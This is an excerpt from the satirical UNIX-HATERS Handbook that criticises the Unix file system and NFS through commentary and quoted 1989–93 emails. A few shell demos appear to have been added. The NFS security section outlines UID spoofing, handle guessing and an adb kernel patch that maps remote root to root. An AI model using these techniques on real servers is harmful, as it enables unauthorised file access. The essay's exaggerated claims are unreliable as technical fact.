Good luck.

3 Forwarded to UNIX-HATERS by Gail Zacharias
4 "Life" is the host name of the NFS and mail server at the MIT AI Laboratory.
We spoke with the current system administrator at the MIT AI Lab about this problem. He told us:

Date: Mon, 4 Oct 93 07:27:33 EDT
From: bruce@ai.mit.edu (Bruce Walton)
Subject: UNIX-HATERS
To: simsong@next.cambridge.ma.us (Simson L. Garfinkel)

Hi Simson,

I recall the episode well. (I would rather forget! :-) ) I was a lab neophyte at the time. In fact it did happen more than once: Life would barf file system errors and panic, and upon reboot the mail partition was hopelessly scrambled. We did write some scripts to grovel the To: addresses and try to assign uids to the files. It was pretty ugly, though, because nobody could trust that they were getting all their mail. The problem vanished when we purchased some more reliable disk hardware…

No File Types

To UFS and all Unix-derived file systems, files are nothing more than long sequences of bytes. (A bag'o'bytes, as the mythology goes, even though they are technically not bags, but streams.) Programs are free to interpret those bytes however they wish. To make this easier, Unix doesn't store type information with each file. Instead, Unix forces the user to encode this information in the file's name! Files ending with a ".c" are C source files, files ending with a ".o" are object files, and so forth. This makes it easy to burn your fingers when renaming files.

To resolve this problem, some Unix files have "magic numbers" that are contained in the file's first few bytes. Only some files—shell scripts, ".o" files, and executable programs—have magic numbers. What happens when a file's "type" (as indicated by its extension) and its magic number don't agree? That depends on the particular program you happen to be running. The loader will just complain and exit. The exec() family of kernel functions, on the other hand, might try starting up a copy of /bin/sh and giving your file to that shell as input.

The lack of file types has become so enshrined in Unix mythology and academic computer science in general that few people can imagine why they might be useful. (Few people, that is, except for Macintosh users, who have known and enjoyed file types since 1984.)
No Record Lengths

Despite the number of databases stored on Unix systems, the Unix file system, by design, has no provision for storing a record length with a file. Storing and maintaining record lengths is left to the programmer. This means that you can have one program that stores a file with 100-byte records, and you can read it back with a program that expects 200-byte records. What if you get it wrong? Again, this depends on the program that you're using. Some programs will notice the difference. Most won't, and won't know the difference.

All of Unix's own internal databases—the password file, the group file, the mail aliases file—are stored as text files. "Records" become lines that are terminated with line-feed characters, and these files must typically be processed from beginning to end whenever they are accessed. Although this method is adequate when each database has less than 20 or 30 lines, when Unix moved out into the "real world" people started trying to put hundreds or thousands of entries into these files. The result? Instant bottleneck trying to read system databases. We're talking real slowdown here. Doubling the number of users halves performance; a real system wouldn't be bothered by the addition of new users. No less than four mutually incompatible workarounds have now been developed to cache the information in /etc/passwd, /etc/group, and other critical databases. All have their failings. This is why you need a fast computer to run Unix.

File and Record Locking

"Record locking" is not a way to keep the IRS away from your financial records, but a technique for keeping them away during the moments that you are cooking them. The IRS is only allowed to see clean snapshots, lest they figure out what you are really up to. Computers are like this, too. Two or more users want access to the same records, but each wants private access while the others are kept at bay. Indeed, many people are surprised that modern Unix has not one, not two, but three completely different systems for record locking.

In the early days, Unix didn't have any record locking at all. Locking violated the "live free and die" spirit of this conceptually clean operating system. Ritchie thought that record locking wasn't something that an operating system should enforce—it was up to user programs. So when Unix hackers finally realized that lock files had to be made and maintained, they came up with the "lock file."

You need an "atomic operation" to build a locking system—an operation that cannot be interrupted midstream. Programs under Unix are like siblings fighting over a toy. In this case, the toy is called the "CPU," and it is constantly being fought over. An atomic operation is guaranteed to complete without your stupid kid brother grabbing the CPU out from under you; the trick is to not give up the CPU at embarrassing moments. Unix's jury-rigged solution, the lock file, rests on the premise that creating a file is an atomic operation: a file can't be created when one is already there. When a program wants to make a change to a critical database called losers, it first creates a lock file called losers.lck. If the program succeeds in creating the file, it assumes that it has the lock and can go and play with the losers file; when it is done, it deletes the file losers.lck. Other programs seeking to modify the losers file at the same time will not be able to create the file losers.lck. Instead, they execute a sleep call—and wait for a few seconds—and try again.

This "solution" had an immediate drawback: processes wasted CPU time by attempting over and over again to create locks. A more severe problem occurred when the system (or the program creating the lock file) crashed, because the lock file would outlive the process that created it and the file would remain forever locked. The solution that was hacked up stored the process ID of the lock-making process inside the lock file, similar to an airline passenger putting name tags on her luggage. When a program finds the lock file, it searches the process table for the process that created the lock file, similar to an airline attempting to find the luggage's owner by driving up and down the streets of the disembarkation point. If the process isn't found, it means that the process died, and the lock file is deleted. The program then tries again to obtain the lock.

After a while of losing with this approach, Berkeley came up with the concept of advisory locks. To quote from the flock(2) man page (we're not making this up):

Advisory locks allow cooperating processes to perform consistent operations on files, but do not guarantee consistency (i.e., processes may still access files without using advisory locks possibly resulting in inconsistencies).
AT&T, meanwhile, was trying to sell Unix into the corporate market, where record locking was required. It came up with the idea of mandatory record locking. So far, so good—until SVR4, when Sun and AT&T had to merge the two different approaches into a single, bloated kernel.

Date: Thu, 17 May 90 22:07:20 PDT
From: Michael Tiemann <cygint!tiemann@labrea.stanford.edu>
To: UNIX-HATERS
Subject: New Unix brain damage discovered

I'm sitting next to yet another victim of Unix. We have been friends for years, and many are the flames we have shared about The World's Worst Operating System (Unix, for you Unix weenies). One of his favorite hating points was the [alleged] lack of file locking. He was always going on about how under real operating systems (ITS and MULTICS among others), one never had to worry about losing mail, losing files, needing to run fsck on every reboot… the minor inconveniences Unix weenies suffer with the zeal of monks engaging in mutual flagellation. For reasons I'd rather not mention, he is trying to fix some code that runs under Unix (who would notice?). Years of nitrous and the Grateful Dead seemed to have little effect on his mind compared with the shock of finding that Unix does not lack locks. Instead of having no locking mechanism, IT HAS TWO!! Of course, both are so unrelated that they know nothing of the other's existence. But the piece de resistance is that a THIRD system call is needed to tell which of the two locking mechanisms (or both!) are in effect.

Michael

This doesn't mean, of course, that you won't find lock files on your Unix system today. Dependence on lock files is built into many modern Unix utilities, such as the current implementations of UUCP and cu. Furthermore, lock files have such a strong history with Unix that many programmers today are using them, unaware of their problems.
Only the Most Perfect Disk Pack Need Apply

One common problem with Unix is perfection: while offering none of its own, the operating system demands perfection from the hardware upon which it runs. That's because Unix programs usually don't check for hardware errors—they just blindly stumble along when things begin to fail, until they trip and panic. (You would be surprised how often this happens.) The dictionary defines panic as "a sudden overpowering fright, especially a sudden unreasoning terror often accompanied by mass flight." That's a pretty good description of a Unix panic: the computer prints the word "panic" on the system console and halts, trashing your file system in the process. We've put a list of some of the more informative(?) ones in Figure 4.

FIGURE 4. Unix File System Error Messages

Message — Meaning
panic: fsfull — The file system is full (a write failed), but Unix doesn't know why.
panic: fssleep — fssleep() was called for no apparent reason.
panic: alloccgblk: cyl groups corrupted — Unix couldn't determine the requested disk cylinder from the block number.
panic: DIRBLKSIZ > fsize — A directory file is smaller than the minimum directory size, or something like that.
panic: free_block: freeing free block, dev = 0xXX, block = NN, fs = ufs — Unix tried to free a block that was already on the free list. (Few people see this behavior nowadays, though, because most SCSI hard disks do know how to detect and map out blocks as the blocks begin to fail.)
panic: direnter: target directory link count — Unix accidentally lowered the link count on a directory to zero or a negative number.

The requirement for a perfect disk pack is most plainly evident in the last two of these panic messages. In both of these cases, UFS reads a block of data from the disk, performs an operation on it (such as decreasing a number stored in a structure), and obtains a nonsensical value. What to do? Unix could abort the operation (returning an error to the user). Unix could declare the device "bad" and unmount it. Unix could even try to "fix" the value (such as doing something that makes sense). Unix takes the fourth, easiest way out: it gives up the ghost and forces you to put things back together later. (After all, what are sysadmins paid for, anyway?)

In recent years, the Unix file system has appeared slightly more tolerant of disk woes simply because modern disk drives contain controllers that present the illusion of a perfect hard disk. (Indeed, when a modern SCSI hard disk controller detects a block going bad, it copies the data to another block elsewhere on the disk and then rewrites a mapping table.) Unix never knows what happened. Sooner or later, though, the disk goes bad, and then the beauty of UFS shows through. As Seymour Cray used to say, "You can't fake what you don't have."

Don't Touch That Slash!

UFS allows any character in a filename except for the slash (/) and the ASCII NUL character. (Some versions of Unix allow ASCII characters with the high-bit, bit 8, set. Others don't.) This feature is great—especially in versions of Unix based on Berkeley's Fast File System, which allows filenames longer than 14 characters. It means that you are free to construct informative, easy-to-understand filenames like these:

1992 Sales Report
Personnel File: Verne, Jules
rt005mfkbgkw0.cp

Unfortunately, the rest of Unix isn't as tolerant. Of the filenames shown above, only rt005mfkbgkw0.cp will work with the majority of Unix utilities (which generally can't tolerate spaces in filenames).

However, don't fret: Unix will let you construct filenames that have control characters or graphics symbols in them. (Some versions will even let you build files that have no name at all.) This can be a great security feature—especially if you have control keys on your keyboard that other people don't have on theirs. That's right: you can literally create files with names that other people can't access. It sort of makes up for the lack of serious security access controls in the rest of Unix.
Recall that Unix does place one hard-and-fast restriction on filenames: they may never, ever contain the magic slash character (/), since the Unix kernel uses the slash to denote subdirectories. To enforce this requirement, the Unix kernel simply will never let you create a filename that has a slash in it. (However, you can have a filename with the 0200 bit set, which does list on some versions of Unix as a slash character.)

Never? Well, hardly ever.5

Date: Mon, 8 Jan 90 18:41:57 PST
From: sun!wrs!yuba!steve@decwrl.dec.com (Steve Sekiguchi)
Subject: Info-Mac Digest V8 #35

I've got a rather difficult problem here. We've got a Gator Box running the NFS/AFP conversion. We use this to hook up Macs and Suns, with the Sun as an AppleShare file server. All of this works great!

Now here is the problem: Macs are allowed to create files on the Sun/Unix fileserver with a "/" in the filename. This is great until you try to restore one of these files from your "dump" tapes. "restore" core dumps when it runs into a file with a "/" in the filename. As far as I can tell the "dump" tape is fine.

Does anyone have a suggestion for getting the files off the backup tape?

Thanks in Advance,
Steven Sekiguchi, Wind River Systems
sun!wrs!steve, steve@wrs.com
Emeryville CA, 94608

Apparently Sun's circa 1990 NFS server (which runs inside the kernel) assumed that an NFS client would never, ever send a filename that had a slash inside it and thus didn't bother to check for the illegal character. We're surprised that the files got written to the dump tape at all. (Then again, perhaps they didn't; there's really no way to tell for sure.)

5 Forwarded to UNIX-HATERS by Steve Strassmann.
Moving Your Directories

Historically, Unix lacked a standard program for moving a directory from one device (or partition) to another. This is rather surprising, considering that Unix (falsely) prides itself on having invented the hierarchical file system. Indeed, Unix provides no tools for maintaining recursive directories of files. Although some versions of Unix now have a mvdir command, for more than a decade the standard way to move directories around was with the cp command, and many people still use cp for this purpose (even though the program doesn't preserve modification dates, authors, or other file attributes). But cp can blow up in your face.

Date: Mon, 14 Sep 92 23:46:03 EDT
From: Alan Bawden <Alan@lcs.mit.edu>
To: UNIX-HATERS
Subject: what else?

Ever want to copy an entire file hierarchy to a new location? I wanted to do this recently, and I found the following on the man page for the cp(1) command:

NAME
cp - copy files
…
cp -rR [ -ip ] directory1 directory2
…
-r -R Recursive. If any of the source files are directories, copy the directory along with its files (including any subdirectories and their files). The destination must be a directory.

Sounds like just what I wanted, right? (At this point half my audience should already be screaming in agony—"NO! DON'T OPEN THAT DOOR! THAT'S WHERE THE ALIEN IS HIDING!") So I went ahead and typed the command. Hmm… Sure did seem to be taking a long time. And then I remembered this horror from further down in the cp(1) man page:

BUGS
cp(1) copies the contents of files pointed to by symbolic links. It does not copy the symbolic link itself. This can lead to inconsistencies when directory hierarchies are replicated. Filenames that were linked in the original hierarchy are no longer linked in the replica…

This is actually rather an understatement of the true magnitude of the bug. The problem is not just one of "inconsistencies"—in point of fact, the copy may be infinitely large if there is any circularity in the symbolic links in the source hierarchy.

The solution, as any well-seasoned Unix veteran will tell you, is to use tar6 if you want to copy a hierarchy. No kidding.

Imagine all of the wasted disk space on the millions of Unix systems throughout the world. It is estimated that there are 100,000,000,000 bytes of wasted disk space in the world due to Unix. You could probably fit a copy of a better operating system into the wasted disk space of every Unix system, right?

Disk Usage at 110%?

The Unix file system slows down as the disk fills up. Push disk usage much past 90%, and you'll grind your computer to a halt. The Unix solution takes a page from any good politician and fakes the numbers. Unix's df command is rigged so that a disk that is 90% filled gets reported as "100%," 80% gets reported as being "91%" full, and so forth. So you might have 100MB free on your 1000MB disk, but if you try to save a file, Unix will say that the file system is full. 100MB is a large amount of space for a PC-class computer. But for Unix, it's just spare change. Why think when you can just buy bigger disks?

There is a twist if you happen to be the superuser—or a daemon running as root (which is usually the case anyway). In this case, Unix goes ahead and lets you write out files, even though it kills performance. So when you have that disk with 100MB free and the superuser tries to put out 50MB of new files on the disk, the disk's real usage rises to 950MB, and df reports that the disk is at "105% capacity."

6 "tar" stands for tape archiver; it is one of the "standard" Unix programs for making a tape backup of the information on a hard disk. Early versions wouldn't write backups that were more than one tape long. Simple and elegant.
Weird, huh? It's sort of like someone who sets his watch five minutes ahead and then arrives five minutes late to all of his appointments, because he knows that his watch is running fast.

Don't Forget to write(2)

Most Unix utilities don't check the result code from the write(2) system call—they just assume that there is enough space left on the device and keep blindly writing. The assumption is that, if a file could be opened, then all of the bytes it contains can be written. Lenny Foner explains it like this:

Date: Mon, 13 Nov 89 23:20:51 EST
From: foner@ai.mit.edu (Leonard N. Foner)
To: UNIX-HATERS

Geez… I just love how an operating system that is really a thinly disguised veneer over a file system can't quite manage to keep even its file system substrate functioning. I'm particularly enthralled with the idea that, as the file system gets fuller, it trashes more and more data. I guess this is kinda like "soft clipping" in an audio amplifier: rather than have the amount of useful data you can store suddenly hit a wall, it just slowly gets harder and harder to store anything at all…

I've seen about 10 messages from people on a variety of Suns today, all complaining about massive file system lossage. This must be closely related to why 'mv' and other things right now are trying to read shell commands out of files instead of actually moving the files themselves, and why the shell commands coming out of the files correspond to data that used to be in other files but aren't actually in the files that 'mv' is touching anyway…

Performance

So why bother with all this? Unix weenies have a single answer to this question: performance. They wish to believe that the Unix file system is just about the fastest, highest-performance file system that's ever been written. Sadly, they're wrong. Whether you are running the original UFS or the new and improved FFS, the Unix file system has a number of design flaws that prevent it from ever achieving high performance.
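A two-line experiment shows the difference between blind and checked writes. It relies on Linux's /dev/full pseudo-device, which rejects every write with "no space left on device"; on systems without /dev/full the demonstration won't run:

```shell
# Blind write, the Unix-utility way: the data is lost and nobody is told.
echo "precious data" > /dev/full 2>/dev/null

# Checked write: the failed write(2) is at least reported.
if ! echo "precious data" > /dev/full 2>/dev/null; then
    echo "write failed: no space left on device"
fi
```

The first line exits silently; only the second notices that every byte it tried to write went nowhere.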
Date: Tue, 7 May 1991 10:22:23 PDT
From: Stanley's Tool Works <lanning@parc.xerox.com>
Subject: How do you spell "efficient?"
To: UNIX-HATERS

Consider that Unix was built on the idea of processing files. Consider that Unix weenies spend an inordinate amount of time micro-optimizing code. Consider how they rant and rave at the mere mention of inefficient tools like a garbage collector. Then consider this, from an announcement of a recent talk here:

…We have implemented a prototype log-structured file system called Sprite LFS; it outperforms current Unix file systems by an order of magnitude for small-file writes while matching or exceeding Unix performance for reads and large writes. Even when the overhead for cleaning is included, Sprite LFS can use 70% of the disk bandwidth for writing, whereas Unix file systems typically can use only 5-10%.

—smL

So why do people believe that the Unix file system is high performance? Because Berkeley named their file system "The Fast File System." Well, it was faster than the original file system that Thompson and Ritchie had written.

Researchers experimenting with Sprite and other file systems report performance that is 50% to 80% faster than UFS, FFS, or any other file system that implements the Unix standard. Because these file systems don't, they'll likely stay in the research lab: the whole underlying design of the Unix file system—directories that are virtually content free, inodes that lack filenames, and files with their contents spread across the horizon—places an ultimate limit on how efficient any POSIX-compliant file system can ever be.
14
NFS
Nightmare File System

The "N" in NFS stands for Not, or Need, or perhaps Nightmare.
—Henry Spencer

In the mid-1980s, Sun Microsystems developed a system for letting computers share files over a network. Called the Network File System—or, more often, NFS—this system was largely responsible for Sun's success as a computer manufacturer. NFS let Sun sell bargain-basement "diskless" workstations that stored files on larger "file servers," all made possible through the magic of Xerox's1 Ethernet technology. When disks became cheap enough, NFS still found favor because it made it easy for users to share files. Today the price of mass storage has dropped dramatically, yet NFS still enjoys popularity: it lets people store their personal files in a single, central location—the network file server—and access those files from anywhere on the local network.

NFS has evolved an elaborate mythology of its own:

1 Bet you didn't know that Xerox holds the patent on Ethernet, did you?
• NFS file servers simplify network management because only one computer need be regularly written to backup tape.

• NFS lets "client computers" mount the disks on the server as if they were physically connected to themselves. The network fades away and a dozen or a hundred individual workstations look to the user like one big happy time-sharing machine.

• NFS is "operating system independent." This is all the more remarkable, considering that it was designed by Unix systems programmers, developed for Unix, and indeed never tested on a non-Unix system until several years after its initial release. Nevertheless, it is testimony to the wisdom of the programmers at Sun Microsystems that the NFS protocol has nothing in it that is Unix-specific: any computer can be an NFS server or client. Several companies now offer NFS clients for such microcomputers as the IBM PC and Apple Macintosh, apparently proving this claim.

• NFS users never need to log onto the server; the workstation alone suffices. Remote disks are automatically mounted as necessary, and files are accessed transparently. Alternatively, workstations can be set to mount the disks on the server automatically at boot time.

But practice rarely agrees with theory when the Nightmare File System is at work.

Not Fully Serviceable

NFS is based on the concept of the "magic cookie." Every file and every directory on the file server is represented by a magic cookie. To read a file, you send the file server a packet containing the file's magic cookie and the range of bytes that you want to read. The file server sends you back a packet with the bytes. Likewise, to read the contents of a directory, you send the server the directory's magic cookie. The server sends you back a list of the files that are in the remote directory, as well as a magic cookie for each of the files that the remote directory contains.

To start this whole process off, you need the magic cookie for the remote file system's root directory. NFS uses a separate protocol for this called MOUNT. Send the file server's mount daemon the name of the directory that you want to mount, and it sends you back a magic cookie for that directory.
By design, NFS is connectionless and stateless. In practice, it is neither. This conflict between design and implementation is at the root of most NFS problems.

"Connectionless" means that the server program does not keep connections for each client. Instead, NFS uses the Internet UDP protocol to transmit information between the client and the server. People who know about network protocols realize that the initials UDP stand for "Unreliable Datagram Protocol." That's because UDP doesn't guarantee that your packets will get delivered. But no matter: if an answer to a request isn't received, the NFS client simply waits for a few milliseconds and then resends its request.

"Stateless" means that all of the information that the client needs to mount a remote file system is kept on the client, instead of having additional information stored on the server. Once a magic cookie is issued for a file, that file handle will remain good even if the server is shut down and rebooted, as long as the file continues to exist and no major changes are made to the configuration of the server.

Sun would have us believe that the advantage of a connectionless, stateless system is that clients can continue using a network file server even if that server crashes and restarts, because there is no connection that must be reestablished, and all of the state information associated with the remote mount is kept on the client. That was important in Sun's early days, when both kinds of crashes were frequent occurrences. In fact, this was only an advantage for Sun's engineers, who didn't have to write additional code to handle server and client crashes and restarts gracefully.

There's only one problem with a connectionless, stateless system: it doesn't work. File systems, by their very nature, have state. You can only delete a file once, and then it's gone. That's why, if you look inside the NFS code, you'll see lots of hacks and kludges—all designed to impose state on a stateless protocol.

Broken Cookie

Over the years, Sun has discovered many cases in which NFS breaks down. Rather than fundamentally redesign NFS, all Sun has done is hacked upon it. Let's see how the NFS model breaks down in some common cases:
• Example #1: NFS is stateless, but many programs designed for Unix systems require record locking in order to guarantee database consistency.

NFS Hack Solution #1: Sun invented a network lock protocol and a lock daemon, lockd. This network locking system has all of the state and associated problems with state that NFS was designed to avoid.

Why the hack doesn't work: Locks can be lost if the server crashes; as a result, an elaborate restart procedure after the crash is necessary to recover state. Of course, the original reason for making NFS stateless in the first place was to avoid the need for such restart procedures. Instead of hiding this complexity in the lockd program, where it is rarely tested and can only benefit locks, it could have been put into the main protocol, thoroughly debugged, and made available to all programs.

• Example #2: NFS is based on UDP; if a client request isn't answered, the client resends the request until it gets an answer. If the server is doing something time-consuming for one client, all of the other clients who want file service will continue to hammer away at the server with duplicate and triplicate NFS requests, rather than patiently putting them into a queue and waiting for the reply.

NFS Hack Solution #2: When the NFS client doesn't get a response from the server, it backs off and pauses for a few milliseconds before it asks a second time. If it doesn't get a second answer, it backs off for twice as long. Then four times as long, and so on.

Why the hack doesn't work: The problem is that this strategy has to be tuned for each individual NFS server and each network. More often than not, tuning isn't done. Delays accumulate. Performance lags, then drags. Eventually, the sysadmin complains and the company buys a faster LAN or leased line or network concentrator, thinking that throwing money at the problem will make it go away.

• Example #3: If you delete a file in Unix that is still open, the file's name is removed from its directory, but the disk blocks associated with the file are not deleted until the file is closed. This gross hack allows programs to create temporary files that can't be accessed by other programs. (This is the second way that Unix uses to create temporary files; the other technique is to use the mktmp() function and create a temporary file in the /tmp directory that has the process ID in the filename. Deciding which method is the grosser of the two is an exercise left to the reader.)
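The doubling schedule of Hack Solution #2 can be sketched in a few lines; the one-second starting delay and the five retries here are invented for the illustration (real clients start at a few milliseconds):

```shell
# Each unanswered request doubles the pause before the next resend.
delay=1
for attempt in 1 2 3 4 5; do
    echo "request $attempt unanswered; backing off ${delay}s"
    delay=$((delay * 2))
done
```

Whether 1, 2, 4, 8, 16 is the right schedule depends on the particular server and network, which is exactly the tuning the text says never gets done.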
But this hack doesn't work over NFS. The stateless protocol doesn't know that the file is "opened"—as soon as the file is deleted, it's gone.

NFS Hack Solution #3: When an NFS client deletes a file that is open, it really renames the file with a crazy name like ".nfs0003234320" which, because it begins with a leading period, does not appear in normal file listings. When the file is closed on the client, the client sends through the Delete-File command to delete the NFS dot-file.

Why the hack doesn't work: If the client crashes, the dot-file never gets deleted. As a result, NFS servers have to run nightly "clean-up" shell scripts that search for all of the files with names like ".nfs0003234320" that are more than a few days old and automatically delete them. This is why most Unix systems suddenly freeze up at 2:00 a.m. each morning—they're spinning their disks running find. (No kidding!)

So even though NFS builds its reputation on being a "stateless" file system, it's all a big lie. Every single process on the client has state. The server is filled with state—a whole disk worth. It's only the NFS protocol that is stateless. And every single gross hack that's become part of the NFS "standard" is an attempt to cover up that lie, gloss it over, and try to make it seem that it isn't so bad.

No File Security

Putting your computer on the network means potentially giving every pimply faced ten-year-old computer cracker in the world the ability to read your love letters, insert spurious commas into your source code, or even forge a letter of resignation from you to put in your boss's mailbox. You better be sure that your network file system has some built-in security to prevent these sorts of attacks.

Unfortunately, NFS wasn't designed for security; the protocol simply doesn't have any. If you give an NFS file server a valid handle for a file, the server lets you play with it to your heart's content. Go ahead, scribble away: the server doesn't even have the ability to log the network address of the workstation that does the damage. And you better not go on vacation with the mail(1) program still running if you want your mail file to be around when you return.
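The janitorial half of Hack Solution #3 can be simulated in any directory. The dot-file name is the one quoted above; the find invocation is a generic reconstruction of such a clean-up script, not any vendor's actual version. (A real one would add something like -mtime +2 so only files more than a few days old are reaped; it is omitted here so the freshly made file is deleted immediately.)

```shell
# A crashed client leaves its silly-renamed dropping behind...
mkdir -p exportfs
touch exportfs/.nfs0003234320

# ...and the nightly 2:00 a.m. job spins the disks looking for it.
find exportfs -name '.nfs*' -exec rm -f {} \;

ls -A exportfs    # prints nothing: the dropping has been reaped
```

Multiply that find over every exported file system on every server, all at the same hour, and the 2:00 a.m. freeze-up follows.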
MIT's Project Athena attempted to add security to NFS using a network security system called Kerberos. True to its name, the hybrid system is a real dog, as Alan Bawden found out:

Date: Thu, 31 Jan 91 12:49:31 EST
From: Alan Bawden <alan@ai.mit.edu>
To: UNIX-HATERS
Subject: Wizards and Kerberos

Isn't it great how when you go to a Unix weenie for advice, he never tells you everything you need to know? Instead you have to return to him several times so that he can demand-page in the necessary information driven by the faults you are forced to take.

Case in point: When I started using the Unix boxes at LCS I found that I didn't have access to modify remote files through NFS. Knowledgeable people informed me that I had to visit a Grand Exalted Wizard who would add my name and password to the "Kerberos" database. So I did so. The Grand Exalted Wizard told me I was all set: from now on whenever I logged in I would automatically be granted the appropriate network privileges.

So the first time I tried it out, it didn't work. Back to the Unix-knowledgeable to find out. Oh yeah, we forgot to mention that in order to take advantage of your Kerberos privileges to use NFS, you have to be running the nfsauth program. I am briefly annoyed that nfsauth requires me to list the names of all the NFS servers I am planning on using. Another weird thing is that nfsauth doesn't just run once, but hangs around in the background until you log out. Apparently it has to renew some permission or other every few minutes or so. The consequences of all this aren't immediately obvious. OK, so I edit my .login to run nfsauth, and everything seems to be working fine now, so I get back to work.

Eight hours pass. Now it is time to pack up and go home, so I try to write my files back out over the network. Permission denied. Goddamn. But I don't have to find a Unix weenie, because as part of getting set up in the Kerberos database they did warn me that my Kerberos privileges would expire in eight hours. They even mentioned that I could run the kinit program to renew them. So I run kinit and type in my name and password again.
But Unix still doesn't let me write my files back out. I poke around a bit and find that the problem is that when your Kerberos privileges expire, nfsauth crashes. So I start up another nfsauth, once again feeding it the names of all the NFS servers I am using. Now I can write my files back out.

Well, it turns out that I almost always work for longer than eight hours, so this becomes a bit of a routine. So, I ask, how about at least fixing nfsauth so that instead of crashing, it just hangs around and waits for your new Kerberos privileges to arrive? Sorry, can't do that. It seems that nobody can locate the sources to nfsauth. My fellow victims in LCS Unix land assure me that this really is the way it works and that they all just put up with it.

The Exports List

NFS couldn't have been marketed if it looked like the system offered no security, so its creators gave it the appearance of security, without going through the formality of implementing a secure protocol. Recall that if you don't give the NFS server a magic cookie, you can't scribble on the file. So, the NFS theory goes, by controlling access to the cookies, you control access to the files. To get the magic cookie for the root directory of a file system, you need to mount the file system. And that's where the idea of "security" comes in: a special file on the server called /etc/exports lists the exported file systems and the computers to which the file systems are allowed to be exported.

Unfortunately, nothing prevents a rogue program from guessing magic cookies. In practice, these guesses aren't very hard to make. And, since the servers are stateless, once a cookie is guessed (or legitimately obtained) it's good forever. Not being in an NFS server's exports file raises the time to break into a server from a few seconds to a few hours. Not much more.

In a typical firewall-protected network environment, NFS's big security risk isn't the risk of attack by outsiders—it's the risk that insiders with authorized access to your file server can use that access to get at your files as well as their own. Oh sure, you've logged into your workstation, but the NFS server doesn't know that. Since it is stateless, the NFS server has no concept of "logging in."
When you send a magic cookie to the NFS server, asking it to read or write a file, you also tell the server your user number. Want to read George's files? Just change your UID to be George's, and read away. After all, it's trivial to put most workstations into single-user mode. Don't want to go through the hassle of booting the workstation in single-user mode? No problem! You can run user-level programs that send requests to an NFS server—and access anybody's files—just by typing in a 500-line C program or getting a copy from the net archives. The nice thing about NFS is that when you compromise the workstation, you've compromised the server as well.

Because forging packets is so simple, many NFS servers are configured to prevent superuser across the network. Any requests for superuser on the network are automatically mapped to the "nobody" user, which has no privileges. Because of this situation, the superuser has fewer privileges on NFS workstations than non-superuser users have. If you want to modify a file on the server that is owned by root and the file is read-only, you must log onto the server—unless, of course, you patch the server's operating system to eliminate security. If you are logged in as superuser, there is no easy way for you to regain your privilege—no program you can run, no password you can type.

But there's more. Ian Horswill summed it all up in December 1990 in response to a question posed by a person who was trying to run the SUID mail delivery program /bin/mail on one computer but have the mail files in /usr/spool/mail on another computer, mounted via NFS.

Date: Fri, 7 Dec 90 12:48:50 EST
From: "Ian D. Horswill" <ian@ai.mit.edu>
To: UNIX-HATERS
Subject: Computational Cosmology, and the Theology of Unix

It works like this. Sun has this spiffy network file system. Unfortunately, it doesn't have any real theory of access control. This is partly because Unix doesn't have one either. It has two levels: mortal and God. God (i.e., root) can do anything. The problem is that networks make things polytheistic: Should my workstation's God be able to turn your workstation into a pillar of salt? Well gee, that depends on whether my God and your God are on good terms or maybe are really just the SAME God. This is a deep and important theological question that has puzzled humankind for millennia.

The Sun kernel has a user-patchable cosmology. It contains a polytheism bit called "nobody." When network file requests come in from root (i.e., God), it maps them to be requests from the value of the kernel variable "nobody" which as distributed is set to -1, which by convention corresponds to no user whatsoever. The default corresponds to a basically Greek pantheon in which there are many Gods and they're all trying to screw each other (both literally and figuratively in the Greek case). However, by using adb to set the kernel variable "nobody" to 0 in the divine boot image, rather than to -1, you can move to a Ba'hai cosmology in which all Gods are really manifestations of the One Root God, Zero, the binary representation of God (*), thus inventing monotheism.

Thus when the manifestation of the divine spirit, binmail, attempts to create a mailbox on a remote server on a monotheistic Unix, it will be able to invoke the divine change-owner command so as to make it profane enough for you to touch it without spontaneously combusting and having your eternal soul damned to hell. On a polytheistic Unix, the divine binmail isn't divine, so your mail file gets created by "nobody" and when binmail invokes the divine change-owner command, it is returned an error code which it forgets to check.

So: patch the kernel on the file server or run sendmail on the server, knowing that it is, in fact, infallible.

-ian

—————————————————————
(*) That God has a binary representation is just another clear indication that Unix is extremely cabalistic and was probably written by disciples of Aleister Crowley.

Not File System Specific? (Not Quite)

The NFS designers thought that they were designing a networked file system that could work with computers running operating systems other than Unix, and work with file systems other than the Unix file system. Unfortunately, they didn't try to verify this belief before they shipped their initial implementation, thus establishing the protocol as an unchangeable standard. Today we are stuck with it. Although it is true that NFS servers and clients have been written for microcomputers like DOS PCs and Macintoshes, it's also true that none of them work well.
The supposedly inter-OS nature of NFS is a fabrication (albeit a sincere one) of starry-eyed Sun engineers:

Date: 19 Jul 89 19:51:45 GMT
From: tim@hoptoad.uucp (Tim Maroney)
Subject: Re: NFS and Mac IIs
Newsgroups: comp.protocols.nfs, comp.sys.mac2

I don't mean to sound like a broken record here, but the fact is that NFS is not well suited to inter-operating-system environments. It works very well between Unix systems, tolerably well between Unix and the similarly ultra-simple MS-DOS file system. It does not work well when there is a complex file system like Macintosh or VMS involved. It can be made to work, but only with a great deal of difficulty and a very user-visible performance penalty. There are simply too many technical obstacles to producing a good NFS client or server that is compatible with the Macintosh file system. The efficiency constraints imposed by the RPC model are one major problem; the lack of flexibility of the NFS protocol is another.

It may be of interest to some people that TOPS, a Sun Microsystems company, was slated from the time of the acquisition by Sun to produce a Macintosh NFS, and to replace its current product TOPS with this Macintosh NFS. Last year, this attempt was abandoned. TOPS did negotiate with Sun over changes in the NFS protocol that would allow efficient operation with the Macintosh file system. However, these negotiations came to naught because of blocking on the Sun side. Those changes will not happen. There never will be a good Macintosh NFS product without major changes to the NFS protocol.

Tim Maroney, Mac Software Consultant, tim@toad.com

2 Forwarded to UNIX-HATERS by Richard Mlynarik with the comment "Many people (but not Famous Net Personalities) have known this for years."

Virtual File Corruption

What's better than a networked file system that corrupts your files? A file system that doesn't really corrupt them, but only makes them appear as if they are corrupted. NFS does this from time to time.
Date: Fri, 5 Jan 90 14:01:05 EST
From: curt@ai.mit.edu (Curtis Fennell)3
Subject: Re: NFS Problems
To: all-ai@ai.mit.edu

As most of you know, we have been having problems with NFS because of a bug in the operating system on the Suns. We have taken the recommended steps to correct this problem, but until Sun gets us a fix, it will reoccur occasionally. This bug makes it appear that NFS mounted files have been trashed. It does not, in fact, actually trash your files; it only makes it appear as if your files have been trashed.

The symptoms of this problem are: When you go to log in or to access a file, it looks as though the file is garbage or is a completely different file. It may also affect your .login file(s) so that when you log in, you see a different prompt or get an error message to the effect that you have no login files/directory. This is because the system has loaded an incorrect file pointer across the net. Your original file probably is still OK, but it looks bad.

